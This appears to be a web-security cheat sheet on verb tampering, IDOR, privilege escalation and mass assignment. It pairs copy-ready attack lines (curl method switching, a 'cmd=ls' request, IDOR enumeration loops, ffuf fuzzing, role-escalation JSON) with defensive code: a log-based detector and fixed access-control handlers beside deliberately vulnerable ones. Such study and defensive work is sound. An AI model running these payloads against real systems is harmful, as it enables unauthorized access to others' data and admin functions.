
Web Attacks (IDOR / Verb Tampering / BFLA)

Access-control checks from the CWES path: HTTP verb tampering, IDOR enumeration (including encoded IDs), and broken function-level authorization / mass assignment. Each payload sits on its own line so it can be copied directly.

HTTP verb tampering

Try HEAD instead of GET (may bypass an auth check that is only applied to GET/POST; -I sends HEAD correctly, whereas -X HEAD makes curl wait for a body that never arrives):

curl -I http://IP/admin/

Try PUT (may allow file creation):

curl -X PUT http://IP/admin/

Bypass a POST-only filter by switching to GET (-G moves the -d data into the query string, which is where a GET handler reads it):

curl -G http://IP/process.php -d "cmd=ls"

Enumerate accepted verbs:

for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do code=$(curl -s -m 5 -o /dev/null -w "%{http_code}" -X "$method" http://TARGET/admin/resource); echo "$method: $code"; done
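From the defender's side, the same enumeration shows up in the access log as a burst of unusual methods against a protected path, and a successful bypass shows up as a non-allowed method getting a 2xx where GET got 401. The script below is an added example, not from the original page: it parses constructed combined-format log lines, applies an assumed per-path method policy (METHOD_POLICY, deny by default), flags requests that should have been rejected but were not, and lists client IPs that cycled through several methods on one protected path.

```python
import re
from collections import defaultdict

# Constructed access-log lines in Apache/nginx combined format (made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /admin/ HTTP/1.1" 401 0
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "HEAD /admin/ HTTP/1.1" 200 0
10.0.0.5 - - [10/Mar/2024:12:00:03 +0000] "PUT /admin/notes.txt HTTP/1.1" 201 0
10.0.0.5 - - [10/Mar/2024:12:00:04 +0000] "GET /process.php?cmd=ls HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2024:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024
10.0.0.9 - - [10/Mar/2024:12:00:06 +0000] "POST /process.php HTTP/1.1" 200 40
10.0.0.7 - - [10/Mar/2024:12:00:07 +0000] "OPTIONS /admin/resource HTTP/1.1" 403 0
10.0.0.7 - - [10/Mar/2024:12:00:08 +0000] "TRACE /admin/resource HTTP/1.1" 405 0
10.0.0.7 - - [10/Mar/2024:12:00:09 +0000] "DELETE /admin/resource HTTP/1.1" 405 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed per-path method policy (deny by default): for a matching prefix, any
# method not listed should have been rejected by the server.
METHOD_POLICY = {
    "/admin/": {"GET", "POST"},
    "/process.php": {"POST"},
}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # policy is matched on the path, not the query
    return rec


def policy_for(path):
    """Return (prefix, allowed_methods) for the longest matching policy prefix, or None."""
    best = None
    for prefix, methods in METHOD_POLICY.items():
        if path.startswith(prefix) and (best is None or len(prefix) > len(best[0])):
            best = (prefix, methods)
    return best


def find_verb_anomalies(log_text):
    """Requests to a policed path with a non-allowed method that were NOT rejected (status < 400)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        pol = policy_for(rec["path"])
        if pol is None:
            continue
        _, allowed = pol
        if rec["method"] not in allowed and rec["status"] < 400:
            findings.append((rec["ip"], rec["method"], rec["path"], rec["status"]))
    return findings


def verb_scanners(log_text, threshold=3):
    """Client IPs that tried at least `threshold` distinct methods against one policed path."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or policy_for(rec["path"]) is None:
            continue
        seen[(rec["ip"], rec["path"])].add(rec["method"])
    return sorted({ip for (ip, _), methods in seen.items() if len(methods) >= threshold})


if __name__ == "__main__":
    for finding in find_verb_anomalies(SAMPLE_LOG):
        print("bypass candidate:", finding)
    print("method scanners:", verb_scanners(SAMPLE_LOG))
```

On the sample, the HEAD and PUT to /admin/ and the GET to the POST-only /process.php are reported as bypass candidates, while 10.0.0.7's OPTIONS/TRACE/DELETE were all rejected and only surface as a scanner. The usual root cause on Apache is an authorization block scoped with `<Limit GET POST>`, which leaves every other method unprotected; applying the directives unconditionally, or using `<LimitExcept>`, closes that gap.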

IDOR enumeration

Manual - iterate IDs and grep for output:

for i in {1..20}; do curl -s -b "PHPSESSID=SESSION" "http://IP/profile.php?id=$i" | grep "name:"; done

ffuf automation (find IDs that return 200):

ffuf -w ids.txt -u "http://TARGET/api/users/FUZZ/profile" -H "Cookie: session=YOUR_SESSION" -fc 404,403

Encoded ID - decode, modify, re-encode:

echo -n 'dXNlcjEudHh0' | base64 -d
echo -n 'user2.txt' | base64
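The fix for every variant above is the same: the server must scope the lookup to the authenticated user rather than trusting whatever reference the client sends, and encoding the reference (base64 here) changes nothing because it is reversible. The code below is an added example, not from the original page; it uses a constructed in-memory FILES store and shows the vulnerable lookup, the ownership-scoped lookup, and a per-session indirect reference map as an extra layer.

```python
import base64
import binascii
import secrets

# Constructed in-memory store (example data, not from the original page).
FILES = {
    "user1.txt": {"owner": 1, "content": "notes of user 1"},
    "user2.txt": {"owner": 2, "content": "notes of user 2"},
}


def decode_reference(encoded):
    """Turn the client-supplied base64 reference back into a store key, or None if malformed."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def get_file_vulnerable(session_user_id, encoded):
    # IDOR: the reference is decoded and used directly. Base64 is encoding, not
    # authorization, so any user can submit the encoded name of another user's file.
    key = decode_reference(encoded)
    return FILES[key]["content"] if key in FILES else None


def get_file_fixed(session_user_id, encoded):
    # Object-level authorization: the lookup is scoped to the authenticated user,
    # whose id comes from the server-side session, never from the request.
    key = decode_reference(encoded)
    record = FILES.get(key)
    if record is None or record["owner"] != session_user_id:
        return None  # same outcome for "missing" and "not yours": no existence oracle
    return record["content"]


class ReferenceMap:
    """Per-session indirect references: random tokens stand in for real keys.
    A client only holds tokens it was issued, so sequential or guessable ids
    never appear in the request at all."""

    def __init__(self):
        self._tokens = {}

    def issue(self, key):
        token = secrets.token_urlsafe(16)
        self._tokens[token] = key
        return token

    def resolve(self, token):
        return self._tokens.get(token)


def get_file_indirect(session_user_id, refmap, token):
    key = refmap.resolve(token)
    record = FILES.get(key)
    # Ownership is still checked: indirection hides ids, it does not replace authorization.
    if record is None or record["owner"] != session_user_id:
        return None
    return record["content"]


if __name__ == "__main__":
    other = base64.b64encode(b"user2.txt").decode()
    print("vulnerable:", get_file_vulnerable(1, other))   # user 1 reads user 2's file
    print("fixed:", get_file_fixed(1, other))             # None
    refmap = ReferenceMap()
    print("indirect:", get_file_indirect(1, refmap, refmap.issue("user1.txt")))
```

Returning None for both "does not exist" and "not yours" (a single 404 in HTTP terms) matters: a 403-versus-404 split is exactly the oracle the ffuf line above filters on.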

Access control models

Understanding the intended model helps spot where it breaks:

Model                  | Description                                  | Common flaw
DAC (Discretionary)    | Owner grants access per resource             | IDOR: resource IDs not validated per user
MAC (Mandatory)        | System enforces labels (top secret, public)  | Rarely web-app relevant
RBAC (Role-Based)      | Role determines access (admin, user, viewer) | Role parameter trusted from client; horizontal priv esc
ABAC (Attribute-Based) | Access based on user/resource attributes     | Attribute injection via request body

Horizontal privilege escalation

Accessing another user’s resources at the same privilege level. Test by changing a user ID, username, or GUID to another user’s:

GET /api/profile?userId=1337     ← your ID
GET /api/profile?userId=1338     ← someone else's
GET /account/orders/ORDER-001    ← yours
GET /account/orders/ORDER-002    ← another user's order

Vertical privilege escalation

Accessing functionality above your privilege level:

GET /admin/users               ← as a regular user
POST /admin/deleteUser?id=5

Try common admin paths with a low-privilege session in Burp Repeater.

Referer-based access control bypass

If the admin page checks that the Referer is /admin/main:

GET /admin/deleteUser?username=carlos HTTP/1.1
Referer: https://TARGET/admin/main

BFLA / mass assignment

Access admin endpoints directly with a regular-user token:

GET  /admin/users
POST /api/admin/deleteUser

Role escalation via request body - add privileged fields:

{"role": "admin"}
{"isAdmin": true}

Mass assignment via PATCH:

PATCH /api/users/123
{"email": "new@test.com", "role": "admin"}
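The vertical-escalation, Referer and mass-assignment cases above all reduce to two server-side checks: the role used for a function-level decision must come from the session (not from a body field, a header or the Referer), and a PATCH/PUT body must be bound through an allowlist so privileged fields are dropped rather than written. The code below is an added example, not from the original page; the users, field names and the require_role decorator are constructed for illustration.

```python
from dataclasses import dataclass
from functools import wraps


class Forbidden(Exception):
    """Raised when the caller's server-side role or identity does not permit the action."""


@dataclass
class User:
    id: int
    email: str
    role: str = "user"


def make_store():
    # Constructed sample users (not from the original page).
    return {
        1: User(1, "root@test.com", "admin"),
        5: User(5, "victim@test.com"),
        123: User(123, "old@test.com"),
    }


def require_role(*roles):
    """Function-level authorization: the role is read from the authenticated actor
    (server-side session), never from a body field, a header or the Referer."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(store, actor, *args, **kwargs):
            if actor.role not in roles:
                raise Forbidden(f"{fn.__name__} requires one of {roles}")
            return fn(store, actor, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def admin_delete_user(store, actor, target_id):
    return store.pop(target_id, None) is not None


def update_user_vulnerable(store, actor, target_id, payload):
    # Mass assignment: every JSON key is bound straight onto the model,
    # so {"role": "admin"} or {"isAdmin": true} lands on the object unchecked.
    user = store[target_id]
    for key, value in payload.items():
        setattr(user, key, value)
    return user


SELF_WRITABLE = {"email"}            # what a user may change on their own record
ADMIN_WRITABLE = {"email", "role"}   # what an admin may change on any record


def update_user_fixed(store, actor, target_id, payload):
    # Object-level check first: only your own record unless you are an admin ...
    if actor.id != target_id and actor.role != "admin":
        raise Forbidden("cannot modify another user's record")
    # ... then bind only allowlisted fields; everything else is reported, not applied.
    allowed = ADMIN_WRITABLE if actor.role == "admin" else SELF_WRITABLE
    user = store[target_id]
    rejected = sorted(set(payload) - allowed)
    for key in allowed & set(payload):
        setattr(user, key, payload[key])
    return user, rejected


def denied(fn, *args):
    """True if calling fn(*args) is refused with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    store = make_store()
    body = {"email": "new@test.com", "role": "admin", "isAdmin": True}
    print("vulnerable:", update_user_vulnerable(store, store[123], 123, body))
    store = make_store()
    print("fixed:", update_user_fixed(store, store[123], 123, body))
    print("regular user deleting:", denied(admin_delete_user, store, store[123], 5))
```

Logging the rejected keys (rather than silently dropping them) is worth keeping: a PATCH that carries "role" or "isAdmin" from a non-admin session is a cheap, high-signal detection event.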